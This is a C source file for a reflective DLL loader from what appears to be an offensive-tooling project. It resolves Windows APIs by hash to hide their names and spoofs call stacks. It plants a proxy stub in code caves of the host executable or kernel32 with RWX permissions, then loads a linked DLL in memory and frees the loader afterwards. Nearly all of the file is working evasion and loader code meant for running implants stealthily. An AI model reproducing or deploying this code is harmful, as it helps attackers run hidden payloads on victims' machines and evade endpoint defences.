/*
 * Copyright 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * Redistribution and use in source and binary forms, with or without modification, are
 * permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this list of
 * conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice, this list of
 * conditions and the following disclaimer in the documentation and/or other materials provided
 * with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its contributors may be used to
 * endorse or promote products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
 * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * function prototypes
 *
 * SetupProxy() is defined later in this file. It is declared up front because go(), which
 * calls it, is the first definition in the file.
 */
void SetupProxy(char *, char *);

/*
 * this is the REAL entry point to this whole mess and it needs to go first!
 *
 * noinline keeps go() as a function of its own; no_reorder is the GCC attribute that asks the
 * compiler not to shuffle this definition relative to other no_reorder/top-level items.
 * All go() does is capture its caller's context and hand it to SetupProxy().
 */
__attribute__((noinline, no_reorder)) void go() {
	/*
	 * Note, we're using GCC builtins (as shipped with MinGW-w64) to get our return address
	 * and frame ptr:
	 *
	 *  - __builtin_return_address(0) is the address go() will return to.
	 *  - __builtin_frame_address(0) is go()'s own frame address. I'm peeking the value
	 *    stored there (one pointer-sized read) to go one frame up.
	 *
	 * NOTE(review): reading the parent frame pointer this way assumes the build keeps frame
	 * pointers -- confirm against the compiler flags.
	 */
	SetupProxy(__builtin_return_address(0), *(char **)__builtin_frame_address(0));
}

/*
 * Our includes
 */
#include "loaderdefs.h"
#include "loader.h"
#include "picorun.h"
#include "resolve_eat.h"
#include "proxy.h"

/*
 * these might help: map memset/memcpy onto the __stosb/__movsb intrinsics.
 *
 * Each macro expands to ONE expression with no trailing semicolon -- the caller's own ';'
 * ends the statement, which keeps the macros usable inside unbraced if/else bodies and
 * larger expressions. Every argument is parenthesized so that a compound argument such as
 * `dst + offset` is cast as a whole rather than only its first operand.
 */
#define memset(x, y, z) __stosb((unsigned char *)(x), (y), (z))
#define memcpy(x, y, z) __movsb((unsigned char *)(x), (unsigned char *)(y), (z))

/*
 * build a table of functions we need/want
 *
 * WIN32_FUNC(x) declares a struct member named x whose type is "pointer to function x",
 * taken from whatever declaration of x is already in scope.
 */
#define WIN32_FUNC( x ) __typeof__( x ) * x

/*
 * The state shared by every stage of this loader: resolved Win32 functions, the installed
 * proxy, and the caller context captured by go().
 *
 * This struct is cast to (IMPORTFUNCS *) in several places in this file, so the members
 * tagged IMPORTFUNCS must remain first and in this order.
 * NOTE(review): IMPORTFUNCS itself is declared in a header not shown here -- confirm its
 * layout before changing the head of this struct.
 */
typedef struct {
	WIN32_FUNC(LoadLibraryA);	/* IMPORTFUNCS */
	WIN32_FUNC(GetProcAddress);	/* IMPORTFUNCS */
	WIN32_FUNC(VirtualAlloc);
	WIN32_FUNC(VirtualProtect);
	PROXY      proxy;		/* our proxy PIC, we can use it here too */
	ULONG_PTR  parentReturnAddress;	/* parent return address to pass on */
	ULONG_PTR  parentFramePointer;	/* parent frame pointer to pass on */
	WIN32_FUNC(GetModuleHandleA);
} WIN32FUNCS;

/*
 * Hash constants handed to findModuleByHash() (module) and findFunctionByHash() (exports),
 * so that no module or function name strings are needed in this file.
 *
 * Need other hashes?
 *
 * https://github.com/ihack4falafel/ROR13HashGenerator
 *
 * NOTE(review): the hashing scheme is implemented by the lookup helpers, which are not
 * shown here; presumably ROR13, going by the generator linked above -- confirm.
 */
#define KERNEL32DLL_HASH	  0x6A4ABC5B

/* one hash per member of WIN32FUNCS that findNeededFunctions() fills in */
#define LOADLIBRARYA_HASH	  0xEC0E4E8E
#define GETPROCADDRESS_HASH	  0x7C0DFCAA
#define VIRTUALALLOC_HASH	  0x91AFCA54
#define VIRTUALPROTECT_HASH       0x7946C61B
#define GETMODULEHANDLEA_HASH     0xD3324904

/*
 * Fill in the Win32 function pointers of `funcs`.
 *
 * The module is located with KERNEL32DLL_HASH and each function is then looked up in it by
 * its own hash. Members of `funcs` other than these five pointers are left untouched.
 */
void findNeededFunctions(WIN32FUNCS * funcs) {
	/* funcs->name = the export of `kernel32` matching `hash`, typed as a pointer to name */
#define RESOLVE(name, hash) \
	funcs->name = (__typeof__(name) *)findFunctionByHash(kernel32, hash)

	char * kernel32 = findModuleByHash(KERNEL32DLL_HASH);

	RESOLVE(LoadLibraryA,     LOADLIBRARYA_HASH);
	RESOLVE(GetProcAddress,   GETPROCADDRESS_HASH);
	RESOLVE(VirtualAlloc,     VIRTUALALLOC_HASH);
	RESOLVE(VirtualProtect,   VIRTUALPROTECT_HASH);
	RESOLVE(GetModuleHandleA, GETMODULEHANDLEA_HASH);

#undef RESOLVE
}

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this loader.
 *
 * GETRESOURCE(x) yields the run-time address of the linked resource symbol x:
 *
 *  - WIN_X86 builds: the address is computed from the value returned by caller() plus
 *    ((ULONG_PTR)x + 5). caller() is kept out-of-line (noinline) and returns whatever
 *    WIN_GET_CALLER() reports.
 *    NOTE(review): WIN_GET_CALLER and PTR_OFFSET come from headers not shown here, and the
 *    meaning of the "+ 5" is not evident from this file -- confirm against the Crystal
 *    Palace documentation before changing any of this.
 *  - all other builds: simply the address of x.
 *
 * Neither expansion parenthesizes x, so pass a plain symbol name only.
 */
#ifdef WIN_X86
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }
#define GETRESOURCE(x) PTR_OFFSET(caller(), (ULONG_PTR)x + 5)
#else
#define GETRESOURCE(x) (char *)&x
#endif

/*
 * Zero-length marker symbols, each placed in its own named section. They are only ever used
 * through GETRESOURCE() to obtain an address:
 *
 *  - rPROXYPIC   is read as a _RESOURCE by SetupProxy() (the proxy PIC)
 *  - rHOOKOBJECT is the source image of the hook PICO
 *  - rDLLDATA    is handed to ParseDLL() as the DLL to load
 *  - rFREEOBJECT is the source image of the free-and-run PICO
 *
 * NOTE(review): the data that ends up at these sections is supplied outside this file,
 * presumably by the linker specification -- confirm.
 */
char rPROXYPIC[0]    __attribute__((section("my_proxy")));
char rHOOKOBJECT[0]  __attribute__((section("my_hooks")));
char rDLLDATA[0]     __attribute__((section("my_data")));
char rFREEOBJECT[0]  __attribute__((section("my_free")));

/*
 * A length-prefixed blob. SetupProxy() views the proxy PIC resource through this type and
 * copies `length` bytes starting at `value`.
 */
typedef struct {
        int   length;	/* number of bytes in value[] */
        char  value[];	/* the payload itself, directly after the length */
} _RESOURCE;

/*
 * Get the start address of our PIC DLL loader.
 *
 * That is the address of go(), the first function in this file. On WIN_X86 builds it is
 * computed the same way GETRESOURCE() computes an address (caller() plus an offset); on
 * other builds the address of go is used directly.
 *
 * ReflectiveLoader() passes the result to the free-and-run PICO as its `loader` argument.
 */
char * getStart() {
#ifdef WIN_X86
	return PTR_OFFSET(caller(), (ULONG_PTR)go + 5);
#else
	return (char *)go;
#endif
}

/*
 * Our PICO runners.
 *
 * PICOARGS bundles the three pointers PicoGo() needs to load one PICO.
 */
typedef struct {
	char * srcData;	/* the linked PICO image (a GETRESOURCE() address in this file) */
	char * dstCode;	/* destination buffer passed to PicoLoad() for the PICO's code */
	char * dstData;	/* destination buffer passed to PicoLoad() for the PICO's data */
} PICOARGS;

/*
 * Load the PICO described by `pico` and hand back its entry point, so the caller can cast
 * it to the right signature and call it.
 *
 * `funcs` is passed to PicoLoad() as an IMPORTFUNCS table.
 */
PICOMAIN_FUNC PicoGo(WIN32FUNCS * funcs, PICOARGS * pico) {
	char * image = pico->srcData;
	char * code  = pico->dstCode;

	/* place the PICO into its destination buffers... */
	PicoLoad((IMPORTFUNCS *)funcs, image, code, pico->dstData);

	/* ...and report where execution should begin */
	return PicoEntryPoint(image, code);
}

/* entry point signature of the hook PICO: it receives the function table */
typedef void (*PICOHOOK_FUNC_1)(IMPORTFUNCS * funcs);
/* entry point signature of the free-and-run PICO: loader start, DLL entry point, DLL base */
typedef void (*PICOMAIN_FUNC_3)(char * loader, char * dllEntry, char * dllBase);

/*
 * How we're going to layout our memory to keep our DLL and PICOs in the same space.
 *
 * ReflectiveLoader() makes a single allocation of sizeof(LAYOUT) + SizeOfDLL() bytes and
 * views it through this struct: four fixed 4096-byte regions for the two PICOs, followed
 * by the loaded DLL image.
 *
 * NOTE(review): nothing in this file checks that a PICO's code or data fits in its
 * 4096-byte region -- confirm the sizes against the linked objects.
 */
typedef struct {
	char freeandrun_code[4096];	/* code of the free-and-run PICO */
	char hook_code[4096];		/* code of the hook PICO */
	char hook_data[4096];		/* data of the hook PICO */
	char freeandrun_data[4096];	/* data of the free-and-run PICO */
	char dllbase[0];		/* zero-length marker: the DLL image starts here */
} LAYOUT;

/*
 * Load the DLL linked with this loader and pass execution on to it.
 *
 * `funcs` must already be fully populated by SetupProxy(): resolved Win32 functions, the
 * installed proxy, and the parent return address / frame pointer.
 *
 * Steps, in order (the order matters):
 *   1. parse the linked DLL
 *   2. allocate one region for the LAYOUT + the DLL, through the proxy
 *   3. load and run the hook PICO
 *   4. load the DLL and process its imports
 *   5. load the free-and-run PICO and call it with the loader start, DLL entry point and
 *      DLL base
 *
 * If the allocation in step 2 fails, the function returns without loading anything.
 */
void ReflectiveLoader(WIN32FUNCS * funcs) {
	/* find our DLL appended to this PIC */
	char * src = GETRESOURCE(rDLLDATA);

	/* parse our DLL! */
	DLLDATA  data;
	ParseDLL(src, &data);

	/*
	 * allocate memory for our DLL and the other stuff within our layout.
	 *
	 * note that we're using our previously installed proxy PIC for this. :)
	 * Our hook module (setup next) will take care of proxying after this.
	 */
	PROXYCALL call;
	call.function = (ULONG_PTR)funcs->VirtualAlloc;
	call.argc     = 4;
	call.args[0]  = (ULONG_PTR)NULL;
	call.args[1]  = (ULONG_PTR)(sizeof(LAYOUT) + SizeOfDLL(&data));
	call.args[2]  = (ULONG_PTR)(MEM_RESERVE | MEM_COMMIT);
	call.args[3]  = (ULONG_PTR)PAGE_EXECUTE_READWRITE;

	/* the caller context captured in go(); handed to the proxy along with the call */
	call.spoofme.frameaddr = funcs->parentFramePointer;
	call.spoofme.retaddr   = funcs->parentReturnAddress;

	LAYOUT * dst;
	dst = (LAYOUT *)funcs->proxy(&call);

	/*
	 * VirtualAlloc reports failure with NULL. Everything below writes through dst, so
	 * bail out here instead of dereferencing a NULL pointer.
	 */
	if (dst == NULL)
		return;

	/* Before we go ANY further, let's run our COFF to setup our hooks */
	PICOARGS hook;
	hook.srcData = GETRESOURCE(rHOOKOBJECT);
	hook.dstCode = dst->hook_code;
	hook.dstData = dst->hook_data;

	/* PicoGo() returns the entry point; the hook PICO is called with our function table */
	((PICOHOOK_FUNC_1)PicoGo(funcs, &hook)) ((IMPORTFUNCS *)funcs);

	/* load the DLL into the tail of our layout */
	LoadDLL(&data, src, dst->dllbase);

	/* process the imports */
	ProcessImports((IMPORTFUNCS *)funcs, &data, dst->dllbase);

	/* pass execution on to our free COFF which will free() this module out of memory */
	PICOARGS runme;
	runme.srcData = GETRESOURCE(rFREEOBJECT);
	runme.dstCode = dst->freeandrun_code;
	runme.dstData = dst->freeandrun_data;

	((PICOMAIN_FUNC_3)PicoGo(funcs, &runme)) (getStart(), (char *)EntryPoint(&data, dst->dllbase), dst->dllbase);
}


/* true when every bit set in y is also set in x */
#define FLAG(x, y) ( ((x) & (y)) == (y) )

/*
 * Round x down to the start of its 0x1000-byte page, as a char *.
 *
 * x is parenthesized at each use so that a compound argument (e.g. `base + offset`) is
 * converted as a whole, and the expansion is wrapped so it composes inside larger
 * expressions. Note that x is still evaluated twice -- do not pass an argument with side
 * effects.
 */
#define ROUND_DOWN_PAGE(x) ((char *)((ULONG_PTR)(x) - ((ULONG_PTR)(x) % 0x1000)))

/*
 * find slack space at the end of an eXecutable section that can fit our payload.
 */
char * findCodeCave(char * dllBase, int length) {
	DLLDATA                 data;
	DWORD                   numberOfSections;
	IMAGE_SECTION_HEADER  * sectionHdr       = NULL;
	IMAGE_SECTION_HEADER  * sectionNxt       = NULL;

	/* parse our DLL! */
	ParseDLL(dllBase, &data);

	/* loop through our sections */
	numberOfSections = data.NtHeaders->FileHeader.NumberOfSections;
	sectionHdr       = (IMAGE_SECTION_HEADER *)PTR_OFFSET(data.OptionalHeader, data.NtHeaders->FileHeader.SizeOfOptionalHeader);
	for (int x = 0; (x + 1) < numberOfSections; x++) {
		/* look for our eXecutable section, there-in lives our... code cave */
		if (FLAG(sectionHdr->Characteristics, IMAGE_SCN_MEM_EXECUTE)) {
			/* let's look at our next section, we need it to get the right size of the code cave */
			sectionNxt      = sectionHdr + 1;

			/* calculate the size, based on section headers */
			DWORD size      = sectionNxt->VirtualAddress - sectionHdr->VirtualAddress;

			/* calculate the size of our code cave */
			DWORD cavesize  = size - sectionHdr->SizeOfRawData;

			/* if we fit, return it */
			if (length < cavesize)
				return dllBase + (sectionNxt->VirtualAddress - cavesize);
		}

		/* advance to our next section */
		sectionHdr++;
	}

	return NULL;
}

/*
 * Install our proxy PIC somewhere in memory, ideally in image memory (e.g., backed by a module on disk). This is
 * a risky and unmasked operation... but once this is done, we've got a nice call stack munging proxy that can run
 * whatever we give to it. And, that's pretty cool.
 */
void SetupProxy(char * retaddr, char * frameaddr) {
	WIN32FUNCS   funcs;
	_RESOURCE  * src;
	DWORD        oldProt;
	char       * hModule;

	src = (_RESOURCE *)GETRESOURCE(rPROXYPIC);

	/*
	 * Keep track of the return address and frame pointer from the context that called our loader. These are
	 * the values we are going to "spoof" later on.
	 *
	 * Note, I've opted to detect when the framepointer is NULL, and use that as a clue that our execution
	 * started from a context without a good frame behind us (e.g., CreateRemoteThread). In these situations,
	 * if we spam the return address without a valid frame pointer--we're going to get a stack unwinding that's
	 * less predictable.
	 *
	 * By opting to NULL the return address when the frame pointer is null, my goal is to, at least, get a
	 * truncated call stack in these situations.
	 */
	if (frameaddr == 0) {
		funcs.parentReturnAddress = (ULONG_PTR)0;
		funcs.parentFramePointer  = (ULONG_PTR)0;
	}
	else {
		funcs.parentReturnAddress = (ULONG_PTR)retaddr;
		funcs.parentFramePointer  = (ULONG_PTR)frameaddr;
	}

	/* resolve the functions we'll need */
	findNeededFunctions(&funcs);

	/* (1) we're going to search for a code cave in... our executable */
	hModule     = (char *)funcs.GetModuleHandleA(NULL);
	funcs.proxy = (PROXY)findCodeCave(hModule, src->length);

	/* (2) if we can't find a code cave in our executable, let's find one elsewhere. How about kernel32?
	 * And, a good place to note: bad idea on x86. There are reserved sections between sections breaking
	 * my code cave calculation algorithm. You'll end up in memory you don't want to be in. */
#ifdef WIN_X64
	if (funcs.proxy == NULL) {
		hModule = (char *)findModuleByHash(KERNEL32DLL_HASH);
		funcs.proxy = (PROXY)findCodeCave(hModule, src->length);
	}
#endif
	/* (3) if there's no space in our executable, then just do a VirtualAlloc--life goes on */
	if (funcs.proxy == NULL)
		funcs.proxy = (PROXY)funcs.VirtualAlloc( NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE );

	/* change the permissions of our PIC to RWX */
	funcs.VirtualProtect(ROUND_DOWN_PAGE(funcs.proxy), 0x1000, PAGE_EXECUTE_READWRITE, &oldProt);

	/* copy our proxy PIC over */
	memcpy(funcs.proxy, src->value, src->length);

	/* And, that's it... continue the process */
	ReflectiveLoader(&funcs);
}
